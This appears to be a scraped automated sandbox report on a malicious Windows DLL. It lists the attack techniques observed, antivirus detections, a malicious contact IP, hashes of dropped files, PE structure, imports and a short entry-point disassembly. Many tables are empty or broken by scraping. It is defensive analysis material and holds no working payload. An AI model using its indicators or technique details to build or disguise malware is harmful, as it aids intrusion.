| 1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
| Default Accounts | 2 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 413 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 11 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | 413 Process Injection | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
| Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 11 Remote System Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
| Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 1 System Network Configuration Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop |
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 40% | ReversingLabs | Win32.Trojan.Jaik | ||
| 100% | Joe Sandbox ML |
⊘No Antivirus matches
| Source | Detection | Scanner | Label | Link | Download |
|---|---|---|---|---|---|
| 100% | Avira | HEUR/AGEN.1245293 | Download File |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | Virustotal | Browse |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | Virustotal | Browse | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | URL Reputation | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| l-0007.l-dc-msedge.net | 13.107.43.16 | true | true |
| unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| true |
| unknown | |
| true |
| unknown | |
| true |
| unknown |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false |
| unknown | ||
| false |
| low | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 185.189.151.28 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true |
| Joe Sandbox Version: | 34.0.0 Boulder Opal |
| Analysis ID: | 620156 |
| Start date and time: 04/05/202212:40:41 | 2022-05-04 12:40:41 +02:00 |
| Joe Sandbox Product: | CloudBasic |
| Overall analysis duration: | 0h 12m 9s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Sample file name: | rXN8OIpbzz (renamed file extension from none to dll) |
| Cookbook file name: | default.jbs |
| Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
| Number of analysed new started processes analysed: | 30 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 1 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Detection: | MAL |
| Classification: | mal100.troj.evad.winDLL@26/15@0/1 |
| EGA Information: |
|
| HDC Information: |
|
| HCA Information: |
|
| Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
- Excluded IPs from analysis (whitelisted): 13.107.43.16
- Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, query.prod.cms.rt.microsoft.com, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 5240 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
| Time | Type | Description |
|---|---|---|
| 12:42:13 | API Interceptor | |
| 12:43:02 | API Interceptor |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| 185.189.151.28 | Get hash | malicious | Browse |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| l-0007.l-dc-msedge.net | Get hash | malicious | Browse |
| |
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| AS-SOFTPLUSCH | Get hash | malicious | Browse |
| |
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
|
⊘No context
⊘No context
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | modified |
| Size (bytes): | 11606 |
| Entropy (8bit): | 4.883977562702998 |
| Encrypted: | false |
| SSDEEP: | 192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ |
| MD5: | 243581397F734487BD471C04FB57EA44 |
| SHA1: | 38CB3BAC7CDC67CB3B246B32117C2C6188243E77 |
| SHA-256: | 7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90 |
| SHA-512: | 1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 652 |
| Entropy (8bit): | 3.117340628214124 |
| Encrypted: | false |
| SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryuRwak7YnqqbR1PN5Dlq5J:+RI+ycuZhNACakSbDPNnqX |
| MD5: | 571B3CB43AB7A3A962B41BE2274F3521 |
| SHA1: | 4DE5F7697BC4B839317DB5F169FF23DE442E94AA |
| SHA-256: | 7FEEEFAEF26874370125E0097C4A4F8EBA03F7E8C44D495A11B2E93830D3257B |
| SHA-512: | 59A1D85FEB48925C88AC4AF9CD442FE99E4B5D9B9A24E6782D7ECE34C534F4D94E4ED4F76433A808550933232CEFCFE08134CEDBA6819DDFB5012C6F45F0E61D |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 652 |
| Entropy (8bit): | 3.0886415917501604 |
| Encrypted: | false |
| SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grysCak7YnqqdDPN5Dlq5J:+RI+ycuZhN/akSBPNnqX |
| MD5: | AC9F318528C2E9980E0B55A1D3C46D05 |
| SHA1: | 625826A7F50E78F6F5C8816617D54AC291BA9BCB |
| SHA-256: | 0B4A74B985C030E7F1209E392C387C5BA3159177DFA6F75E94834871ABDD1345 |
| SHA-512: | 89B4D40E8CD270571BFEB0791208328528983A4DA335259EB4898B3A185D1FCA8EF5D5844E3FE4B97685817C87A6F4E9782C972A529A7E30BA1AD105C2950848 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1320 |
| Entropy (8bit): | 3.9726189415617856 |
| Encrypted: | false |
| SSDEEP: | 24:HPjnW9rVwnpZhHkYhKdNWI+ycuZhN/akSBPNnq9hgd:DWOnpLdKd41ul/a3zq9y |
| MD5: | B57E06AF09269FE68011CA9C7263B9C1 |
| SHA1: | 22145379CCA3CE319C692CA90651DAB2B853A773 |
| SHA-256: | 2E51AD976DB23F78659A5886FE4F6D1CC8AEBF49C0947EDE2766F06AD8D84793 |
| SHA-512: | D9677EF1E6433C51795690D2CC93380D1030464A1C46C1468F510594978659D97ECA79C5F9D38C95147F71EB31D8147C4DEF8CC783465BBFD2F6E11750D78B80 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1320 |
| Entropy (8bit): | 3.9737871135359653 |
| Encrypted: | false |
| SSDEEP: | 24:HeijnW9rnzfCXhH+hKdNWI+ycuZhNACakSbDPNnq9hgd:+qWnzfm0Kd41ulZa3Vq9y |
| MD5: | 4A1D627423CCEA7DAE9A6D6F5E440B1E |
| SHA1: | AA8EAAAB1D76DBD9DF4BB89A99D498A4326BCD1F |
| SHA-256: | D853265DC40AA9B37D5E3C5B703BFEE954FA42A1FCB7BC90BAA0B4F249C4A8D3 |
| SHA-512: | 5443B147919DCB4D57A4A5C9D1857C5077A1278523DDECC1163515B7B34D7187B1C9BACD94A88BEA8DBFD90AD2A78FB4706EC3A7196939FD598A168AAA5BCA4D |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 403 |
| Entropy (8bit): | 5.058106976759534 |
| Encrypted: | false |
| SSDEEP: | 6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y |
| MD5: | 99BD08BC1F0AEA085539BBC7D61FA79D |
| SHA1: | F2CA39B111C367D147609FCD6C811837BE2CE9F3 |
| SHA-256: | 8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9 |
| SHA-512: | E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 351 |
| Entropy (8bit): | 5.241360600918718 |
| Encrypted: | false |
| SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23ffzxs7+AEszIWXp+N23fa:p37Lvkmb6KH3WZE8y |
| MD5: | 690F4C449EF12B6B61A60DF8A9E5B710 |
| SHA1: | 4FC81A633BB70A3E65A1891E3E343C0127F52296 |
| SHA-256: | 2D03F9F60B3CBDB6D821443A41D0EA831CE305D0CE301B1F7A335235C89955EA |
| SHA-512: | B5235920836D35661622E2764BE0FC3B46CC01DEB3BB2CB766643887DB43E37A155CA20E0D4496896F328D0AFBAA5CA5C7FE3494B27CE4E4435106721B2FA039 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 3584 |
| Entropy (8bit): | 2.6066887621099695 |
| Encrypted: | false |
| SSDEEP: | 24:etGSd8OmU0t3lm85xWAseO4zVWQ64pfUPtkZf9GwVUWI+ycuZhN/akSBPNnq:6DXQ3r5xNOvQfUuJ9P31ul/a3zq |
| MD5: | 58B1418820FA96CF68C24D094FC6ADAF |
| SHA1: | 2B17556E62E5F0E6DB05525694B7E24A71396BCE |
| SHA-256: | 8EA1346CC7438005ECE13A2CEA06992D029764CC12D73545A7BB708210BB80A5 |
| SHA-512: | 30435A178069A2E6C34752E055C6321D321370215B13ABC305682227486FDC69370EF0A8DB0FFD461F08ACDD331AA9DADA641C2893296D8CC81664F89F0542C1 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | modified |
| Size (bytes): | 848 |
| Entropy (8bit): | 5.316714828382624 |
| Encrypted: | false |
| SSDEEP: | 12:xKIR37Lvkmb6KH3WZE8rKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHkE8rKaM5DqBVKVrdFAMBJTH |
| MD5: | BC11DBA7DC38B1D6A0D93EA764F9B617 |
| SHA1: | 08D99E734D46178C394E555EE9AD7F18848BB855 |
| SHA-256: | 4A56BDE13C5C950901BF0781BAABEC10AE01AEC639CCDB3F6ADBDC6D94F958FC |
| SHA-512: | D8587E8DFD418B11F8E53CD33FF14C226E29F02E4D410335E0AF717B3631A9071DF48F7998C59CD3D99AE1FC835DA5B413CFDFF37C5FD0BA9F18171997007654 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 392 |
| Entropy (8bit): | 4.988829579018284 |
| Encrypted: | false |
| SSDEEP: | 6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy |
| MD5: | 80545CB568082AB66554E902D9291782 |
| SHA1: | D013E59DC494D017F0E790D63CEB397583DCB36B |
| SHA-256: | E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C |
| SHA-512: | C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 351 |
| Entropy (8bit): | 5.278961448116027 |
| Encrypted: | false |
| SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fhmJUzxs7+AEszIWXp+N23fh8:p37Lvkmb6KHQJUWZE8q |
| MD5: | BBFF8ACF9BC4E9151FAC72A25DB4AF65 |
| SHA1: | 28E85B73B747567810B8AC20E17AFC9FDEEB9E84 |
| SHA-256: | 64398A6210E6B4286F665B7241E912A8B52A069282290C01BD38D81A9E0A78F9 |
| SHA-512: | F99941DA18AD6C6EF836767AA9212C05D540CE7F6B5AE6796CAC8269612CD08E95E33B42E0FECDA5FB6E1C2C930DCA623358103DDC4A6E51FC09F8BB7621425D |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 3584 |
| Entropy (8bit): | 2.6018525555800074 |
| Encrypted: | false |
| SSDEEP: | 24:etGSO/u2Bg85z7xlfwZD6QagdWqtkZf9yWI+ycuZhNACakSbDPNnq:6bYb5hFCD6eWdJ9x1ulZa3Vq |
| MD5: | 257B979BFCA7FC27E6D4D61332E3CB81 |
| SHA1: | F9DA7F5A4654015EB64351E4F7C9240120242B8E |
| SHA-256: | 0AF117A0EEA259F2662E5F3F7FD5AAF38C894B7291EBA0B44CCE19B6957CA0A1 |
| SHA-512: | 980305AB481A307E8F7BF1B0BC02805AD177E77DD6CA973CDC9BF30A5014469B9C4857A48C8735E0A395AEBA2CAB225F68CEB43A873685300CD8877F88C40E87 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | modified |
| Size (bytes): | 848 |
| Entropy (8bit): | 5.337242198936176 |
| Encrypted: | false |
| SSDEEP: | 24:AId3ka6KHQ/E8jKaM5DqBVKVrdFAMBJTH:Akka6AsE8jKxDcVKdBJj |
| MD5: | 6934C0F5A74CF275FB8E42ED7A182BDA |
| SHA1: | 60BE0CD7541947626619FB6B9F412A41BB412597 |
| SHA-256: | AAAEA2133DE4806579F16BD80CDDAF898C879A7EA27C37DEC8A047C89FD7B9C4 |
| SHA-512: | 2B85C364ABD535666247B5E0F3F38AB22114BDE385276AADF46C2A191F593A5C4B33CD168CD33285FCAE59DFEB8485EFA664CC45A377781204D9FBA2039393F6 |
| Malicious: | false |
| Preview: |
| File type: | |
| Entropy (8bit): | 7.238617145221457 |
| TrID: |
|
| File name: | rXN8OIpbzz.dll |
| File size: | 442368 |
| MD5: | 6e21e2268df053e95557a2157ff33103 |
| SHA1: | efeefb5833b881475bd421da29719d578babb90c |
| SHA256: | 22a462b2da9c893b5f37dbbc19697d6aeaa28758c2338fca3a806e8d9d3ac483 |
| SHA512: | 06c082964ae3fea79ec03a76be8bca6e9a15da51949edde2a3eda43120a4f209dd490e8bb3dabde28fcc6e2d60e437e0e0632032a457501934034c0172ba3124 |
| SSDEEP: | 6144:rtpWD9yexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rtpOFlJqYhiVDwGU8OqaX1WW3zNg7 |
| TLSH: | 4D94F14977A11DBBEC0807760CF8C51B9B66BE2CA23A71DEA6683CFF7E175511048706 |
| File Content Preview: | MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5...... |
 | |
| Icon Hash: | 9068eccc64f6e2ad |
| Entrypoint: | 0x401430 |
| Entrypoint Section: | .text |
| Digitally signed: | false |
| Imagebase: | 0x400000 |
| Subsystem: | windows gui |
| Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
| DLL Characteristics: | TERMINAL_SERVER_AWARE |
| Time Stamp: | 0x411096D1 [Wed Aug 4 07:57:05 2004 UTC] |
| TLS Callbacks: | |
| CLR (.Net) Version: | |
| OS Version Major: | 5 |
| OS Version Minor: | 0 |
| File Version Major: | 5 |
| File Version Minor: | 0 |
| Subsystem Version Major: | 5 |
| Subsystem Version Minor: | 0 |
| Import Hash: | 0bedc9af0ed7cf2ba33cf662a24d448e |
| Instruction |
|---|
| push ebp |
| mov ebp, esp |
| add ecx, FFFFFFFFh |
| call 00007F5980986A6Ch |
| pop eax |
| pop eax |
| mov dword ptr [00414544h], eax |
| mov edx, dword ptr [00414660h] |
| sub edx, 00005289h |
| call edx |
| ret |
| int3 |
| push esi |
| mov eax, ebx |
| mov dword ptr [00414540h], eax |
| pop dword ptr [00414538h] |
| mov dword ptr [00414548h], ebp |
| mov dword ptr [0041453Ch], edi |
| sub dword ptr [00414548h], FFFFFFFCh |
| loop 00007F5980986A15h |
| mov dword ptr [ebp+00h], eax |
| nop |
| leave |
| push eax |
| cli |
| test byte ptr [edx+esi*4], bh |
| push edx |
| push FFFFFFBAh |
| lea edi, edx |
| xchg eax, esp |
| jbe 00007F59809869FFh |
| cmp al, B4h |
| pop es |
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc18 | 0x8c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x9f28 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xf0c | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd0b0 | 0x38 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0xb0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0xb710 | 0xc000 | False | 0.0735473632812 | data | 1.02109217973 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rdata | 0xd000 | 0x1073 | 0x2000 | False | 0.1806640625 | data | 3.72008028236 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xf000 | 0x79d0 | 0x6000 | False | 0.373819986979 | data | 6.02544165768 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .crt | 0x17000 | 0x1dc8e | 0x1e000 | False | 0.988427734375 | data | 7.9815287954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .erloc | 0x35000 | 0x2ca4f | 0x2d000 | False | 0.988259548611 | data | 7.98122243943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x62000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51663069246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x6c000 | 0x132e | 0x2000 | False | 0.219360351562 | data | 3.73577949218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_BITMAP | 0x62360 | 0x666 | data | English | United States |
| RT_ICON | 0x629c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
| RT_ICON | 0x67228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
| RT_ICON | 0x697d0 | 0xea8 | data | English | United States |
| RT_ICON | 0x6a678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
| RT_ICON | 0x6af20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
| RT_DIALOG | 0x6b488 | 0xb4 | data | English | United States |
| RT_DIALOG | 0x6b540 | 0x120 | data | English | United States |
| RT_DIALOG | 0x6b660 | 0x158 | data | English | United States |
| RT_DIALOG | 0x6b7b8 | 0x202 | data | English | United States |
| RT_DIALOG | 0x6b9c0 | 0xf8 | data | English | United States |
| RT_DIALOG | 0x6bab8 | 0xa0 | data | English | United States |
| RT_DIALOG | 0x6bb58 | 0xee | data | English | United States |
| RT_GROUP_ICON | 0x6bc48 | 0x4c | data | English | United States |
| RT_VERSION | 0x6bc98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
| DLL | Import |
|---|---|
| KERNEL32.dll | EraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak |
| OLEAUT32.dll | GetRecordInfoFromTypeInfo, LoadTypeLibEx |
| USER32.dll | DefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo |
| GDI32.dll | ExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment |
| ADVAPI32.dll | EnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA |
| msvcrt.dll | strcoll, fgetwc, srand |
| Description | Data |
|---|---|
| LegalCopyright | A Company. All rights reserved. |
| InternalName | |
| FileVersion | 1.0.0.0 |
| CompanyName | A Company |
| ProductName | |
| ProductVersion | 1.0.0.0 |
| FileDescription | |
| OriginalFilename | myfile.exe |
| Translation | 0x0409 0x04b0 |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States |  |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
